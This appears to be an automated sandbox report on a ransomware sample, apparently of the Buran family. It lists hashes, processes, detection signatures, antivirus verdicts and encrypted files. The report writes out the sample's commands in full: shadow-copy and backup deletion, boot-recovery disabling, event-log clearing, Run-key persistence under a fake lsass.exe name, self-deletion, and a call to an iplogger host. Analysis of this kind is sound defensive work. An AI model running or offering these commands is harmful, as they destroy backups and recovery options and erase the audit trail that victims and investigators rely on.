1
2* ID: 2303
3* MalFamily: "Malicious"
4
5* MalScore: 10.0
6
7* File Name: "Exes_636d3c669e36510bf337fd2f1ea64732.tmp"
8* File Size: 435200
9* File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
10* SHA256: "83157309528cd13e8d0cf8aa2202449cc454de56a2e9c689c75847e0f6b7f8f4"
11* MD5: "636d3c669e36510bf337fd2f1ea64732"
12* SHA1: "288fefa5d1a74d335d508b1b36453c70071c19b2"
13* SHA512: "a234bd046d8f4f8f73885570c7a5c582b46584f96a33178e70e0930c1dfbaa25ebe436e65002df338fccf6b6999c842947a6e6e8f108a738d50a6bd2ffd279a0"
14* CRC32: "D4F2AC3B"
15* SSDEEP: "6144:CSADzS90C6waTX9h+HkTokdKVx5n7MW2yBbbyMrkOK2qx7bys2T:CnrXb9daxZ7MW2yBbbvgHdx7b"
16
17* Process Execution:
18 "nH3pXIYjPPePo.exe",
19 "cmd.exe",
20 "reg.exe",
21 "lsass.exe",
22 "cmd.exe",
23 "cmd.exe",
24 "cmd.exe",
25 "cmd.exe",
26 "cmd.exe",
27 "cmd.exe",
28 "cmd.exe",
29 "WMIC.exe",
30 "cmd.exe",
31 "vssadmin.exe",
32 "cmd.exe",
33 "reg.exe",
34 "cmd.exe",
35 "reg.exe",
36 "cmd.exe",
37 "reg.exe",
38 "cmd.exe",
39 "attrib.exe",
40 "cmd.exe",
41 "cmd.exe",
42 "wevtutil.exe",
43 "cmd.exe",
44 "wevtutil.exe",
45 "cmd.exe",
46 "wevtutil.exe",
47 "cmd.exe",
48 "sc.exe",
49 "lsass.exe",
50 "lsass.exe",
51 "cmd.exe",
52 "PING.EXE",
53 "services.exe",
54 "svchost.exe",
55 "WmiPrvSE.exe",
56 "VSSVC.exe",
57 "taskhost.exe",
58 "WMIADAP.exe"
59
60
61* Executed Commands:
62 "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
63 "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start",
64 "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe -start",
65 "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )",
66 "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )",
67 "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\"",
68 "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures",
69 "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no",
70 "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet",
71 "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup",
72 "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0",
73 "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup",
74 "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete",
75 "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet",
76 "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
77 "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
78 "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
79 "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h",
80 "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\"",
81 "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application",
82 "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security",
83 "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System",
84 "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled",
85 "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 0",
86 "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -agent 1",
87 "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1",
88 "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete",
89 "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding",
90 "C:\\Windows\\system32\\vssvc.exe",
91 "vssadmin delete shadows /all /quiet",
92 "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f",
93 "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f",
94 "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\"",
95 "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h",
96 "wevtutil.exe clear-log Application",
97 "wevtutil.exe clear-log Security",
98 "wevtutil.exe clear-log System",
99 "sc config eventlog start=disabled"
100
101
102* Signatures Detected:
103
104 "Description": "Behavioural detection: Executable code extraction",
105 "Details":
106
107
108 "Description": "SetUnhandledExceptionFilter detected (possible anti-debug)",
109 "Details":
110
111
112 "Description": "Executed a command line with the /C or /R argument, which terminates the command shell on completion and can be used to hide execution",
113 "Details":
114
115 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
116
117
118 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
119
120
121 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
122
123
124 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
125
126
127 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
128
129
130 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
131
132
133 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
134
135
136 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
137
138
139 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
140
141
142 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
143
144
145 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
146
147
148 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
149
150
151 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
152
153
154 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
155
156
157 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
158
159
160 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
161
162
163 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
164
165
166 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
167
168
169
170
171 "Description": "Creates RWX memory",
172 "Details":
173
174
175 "Description": "Possible date-expiration check: the process exits too soon after checking the local time",
176 "Details":
177
178 "process": "nH3pXIYjPPePo.exe, PID 2244"
179
180
181
182
183 "Description": "A process attempted to delay the analysis task.",
184 "Details":
185
186 "Process": "WmiPrvSE.exe tried to sleep 420 seconds, actually delayed analysis time by 0 seconds"
187
188
189
190
191 "Description": "Performs HTTP requests that are potentially not found in the PCAP.",
192 "Details":
193
194 "url_ioc": "iplogger.ru:80/1Oh8E.jpeg"
195
196
197
198
199 "Description": "A process created a hidden window",
200 "Details":
201
202 "Process": "nH3pXIYjPPePo.exe -> C:\\Windows\\System32\\cmd.exe"
203
204
205
206
207 "Description": "Executed a command line with the /V argument, which modifies variable behaviour and whitespace, allowing for increased obfuscation options",
208 "Details":
209
210 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
211
212
213
214
215 "Description": "Executed a very long command line or script command, which may indicate chained commands or obfuscation",
216 "Details":
217
218 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
219
220
221
222
223 "Description": "Drops a binary and executes it",
224 "Details":
225
226 "binary": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
227
228
229
230
231 "Description": "A ping command was executed with the -n argument, possibly to delay analysis",
232 "Details":
233
234 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
235
236
237 "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
238
239
240 "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
241
242
243
244
245 "Description": "Uses Windows utilities for basic functionality",
246 "Details":
247
248 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
249
250
251 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
252
253
254 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
255
256
257 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
258
259
260 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
261
262
263 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
264
265
266 "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
267
268
269 "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
270
271
272 "command": "reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
273
274
275 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
276
277
278 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
279
280
281 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
282
283
284 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
285
286
287 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
288
289
290 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
291
292
293 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
294
295
296 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
297
298
299 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
300
301
302 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
303
304
305 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wmic shadowcopy delete"
306
307
308 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
309
310
311 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
312
313
314 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
315
316
317 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
318
319
320 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
321
322
323 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
324
325
326 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
327
328
329 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
330
331
332 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
333
334
335 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
336
337
338 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
339
340
341 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C attrib \"%userprofile%\\documents\\Default.rdp\" -s -h"
342
343
344 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
345
346
347 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
348
349
350 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
351
352
353 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
354
355
356 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
357
358
359 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C sc config eventlog start=disabled"
360
361
362 "command": "C:\\Windows\\system32\\PING.EXE ping -n 3 127.1"
363
364
365 "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
366
367
368 "command": "C:\\Windows\\System32\\Wbem\\WMIC.exe wmic shadowcopy delete"
369
370
371 "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
372
373
374 "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Default\" /va /f"
375
376
377 "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
378
379
380 "command": "reg delete \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\" /f"
381
382
383 "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
384
385
386 "command": "reg add \"HKEY_CURRENT_USER\\Software\\Microsoft\\Terminal Server Client\\Servers\""
387
388
389 "command": "attrib \"C:\\Users\\user\\documents\\Default.rdp\" -s -h"
390
391
392 "command": "sc config eventlog start=disabled"
393
394
395
396
397 "Description": "Attempts to delete volume shadow copies",
398 "Details":
399
400
401 "Description": "Deletes its original binary from disk",
402 "Details":
403
404
405 "Description": "Attempts to repeatedly call a single API many times in order to delay analysis",
406 "Details":
407
408 "Spam": "services.exe (504) called API GetSystemTimeAsFileTime 126917 times"
409
410
411
412
413 "Description": "Modifies boot configuration settings",
414 "Details":
415
416 "disables_system_recovery": "Modifies the boot configuration to disable startup recovery"
417
418
419 "ignorefailures": "Modifies the boot configuration to disable Windows error recovery"
420
421
422
423
424 "Description": "A system process is generating network traffic, likely as a result of process injection",
425 "Details":
426
427 "http_request": "lsass.exe_InternetConnectA_iplogger.ru"
428
429
430 "http_request_path": "lsass.exe_HttpOpenRequestA_1Oh8E.jpeg"
431
432
433
434
435 "Description": "Installs itself for autorun at Windows startup",
436 "Details":
437
438 "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Local Security Authority Subsystem Service"
439
440
441 "data": "\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" -start"
442
443
444
445
446 "Description": "Writes a potential ransom message to disk",
447 "Details":
448
449 "ransom_file": "!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT"
450
451
452
453
454 "Description": "File has been identified as malicious by 15 antivirus engines on VirusTotal",
455 "Details":
456
457 "Cylance": "Unsafe"
458
459
460 "CrowdStrike": "win/malicious_confidence_100% (D)"
461
462
463 "Symantec": "ML.Attribute.HighConfidence"
464
465
466 "APEX": "Malicious"
467
468
469 "Endgame": "malicious (high confidence)"
470
471
472 "Invincea": "heuristic"
473
474
475 "McAfee-GW-Edition": "BehavesLike.Win32.PWSQQPass.gh"
476
477
478 "FireEye": "Generic.mg.636d3c669e36510b"
479
480
481 "SentinelOne": "DFI - Malicious PE"
482
483
484 "Microsoft": "Trojan:Win32/Suloc.A"
485
486
487 "Acronis": "suspicious"
488
489
490 "VBA32": "Malware-Cryptor.General.3"
491
492
493 "Rising": "Trojan.Generic@ML.100 (RDML:kwEnH7CqjV0yUM4V3OzqNQ)"
494
495
496 "Cybereason": "malicious.5d1a74"
497
498
499 "Qihoo-360": "HEUR/QVM19.1.F7E7.Malware.Gen"
500
501
502
503
504 "Description": "Detects VirtualBox through the presence of a file",
505 "Details":
506
507 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat"
508
509
510 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf"
511
512
513 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf"
514
515
516 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat"
517
518
519 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf"
520
521
522 "file": "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat"
523
524
525
526
527 "Description": "Clears Windows events or logs",
528 "Details":
529
530 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
531
532
533 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
534
535
536 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
537
538
539 "command": "wevtutil.exe clear-log Application"
540
541
542 "command": "wevtutil.exe clear-log Security"
543
544
545 "command": "wevtutil.exe clear-log System"
546
547
548
549
550 "Description": "Appears to use character obfuscation in a command line",
551 "Details":
552
553 "command": "\"C:\\Windows\\system32\\cmd.exe\" /e:on /c md \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\" & copy \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" \"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\" & reg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"Local Security Authority Subsystem Service\" /t REG_SZ /F /D \"\\\"C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe\\\" -start\""
554
555
556
557
558 "Description": "Creates a copy of itself",
559 "Details":
560
561 "copy": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe"
562
563
564
565
566 "Description": "Anomalous binary characteristics",
567 "Details":
568
569 "anomaly": "Found duplicated section names"
570
571
572
573
574 "Description": "Uses suspicious command line tools or Windows utilities",
575 "Details":
576
577 "command": "\"C:\\Windows\\system32\\cmd.exe\" /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
578
579
580 "command": "C:\\Windows\\System32\\cmd.exe /c for /l %x in (1,1,999) do ( ping -n 3 127.1 & del \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" & if not exist \"C:\\Users\\user\\AppData\\Local\\Temp\\nH3pXIYjPPePo.exe\" exit )"
581
582
583 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default bootstatuspolicy ignoreallfailures"
584
585
586 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C bcdedit /set default recoveryenabled no"
587
588
589 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete catalog -quiet"
590
591
592 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup"
593
594
595 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete systemstatebackup -keepversions:0"
596
597
598 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wbadmin delete backup"
599
600
601 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C vssadmin delete shadows /all /quiet"
602
603
604 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C del \"%userprofile%\\documents\\Default.rdp\""
605
606
607 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Application"
608
609
610 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log Security"
611
612
613 "command": "\"C:\\Windows\\system32\\cmd.exe\" /C wevtutil.exe clear-log System"
614
615
616 "command": "vssadmin delete shadows /all /quiet"
617
618
619 "command": "wevtutil.exe clear-log Application"
620
621
622 "command": "wevtutil.exe clear-log Security"
623
624
625 "command": "wevtutil.exe clear-log System"
626
627
628
629
630
631* Started Service:
632
633* Mutexes:
634 "Global\\ADAP_WMI_ENTRY",
635 "Global\\RefreshRA_Mutex",
636 "Global\\RefreshRA_Mutex_Lib",
637 "Global\\RefreshRA_Mutex_Flag"
638
639
640* Modified Files:
641 "C:\\Users\\user\\AppData\\Local\\Temp\\3C20D05E.buran",
642 "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\lsass.exe",
643 "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran",
644 "\\??\\PIPE\\wkssvc",
645 "\\Device\\LanmanDatagramReceiver",
646 "\\??\\PIPE\\DAV RPC SERVICE",
647 "\\??\\pipe\\PIPE_EVENTROOT\\CIMV2PROVIDERSUBSYSTEM",
648 "C:\\Windows\\sysnative\\LogFiles\\Scm\\5869f1c1-01d7-41f7-84b7-715672259fa8",
649 "\\??\\PIPE\\samr",
650 "C:\\.doc",
651 "C:\\.doc.3217EE46-3DA6-888C-CFD6-E175EC571166",
652 "C:\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
653 "C:\\.htm",
654 "C:\\.htm.3217EE46-3DA6-888C-CFD6-E175EC571166",
655 "C:\\.jpeg",
656 "C:\\.jpeg.3217EE46-3DA6-888C-CFD6-E175EC571166",
657 "C:\\.jpg",
658 "C:\\.jpg.3217EE46-3DA6-888C-CFD6-E175EC571166",
659 "C:\\.pptx",
660 "C:\\.pptx.3217EE46-3DA6-888C-CFD6-E175EC571166",
661 "C:\\.txt",
662 "C:\\.txt.3217EE46-3DA6-888C-CFD6-E175EC571166",
663 "C:\\.xls",
664 "C:\\.xls.3217EE46-3DA6-888C-CFD6-E175EC571166",
665 "C:\\.zip",
666 "C:\\2960.ini",
667 "C:\\Host.bmp",
668 "C:\\Host.bmp.3217EE46-3DA6-888C-CFD6-E175EC571166",
669 "C:\\Host.docx",
670 "C:\\Host.docx.3217EE46-3DA6-888C-CFD6-E175EC571166",
671 "C:\\Host.html",
672 "C:\\Host.html.3217EE46-3DA6-888C-CFD6-E175EC571166",
673 "C:\\Host.jpeg",
674 "C:\\Host.jpeg.3217EE46-3DA6-888C-CFD6-E175EC571166",
675 "C:\\Host.jpg",
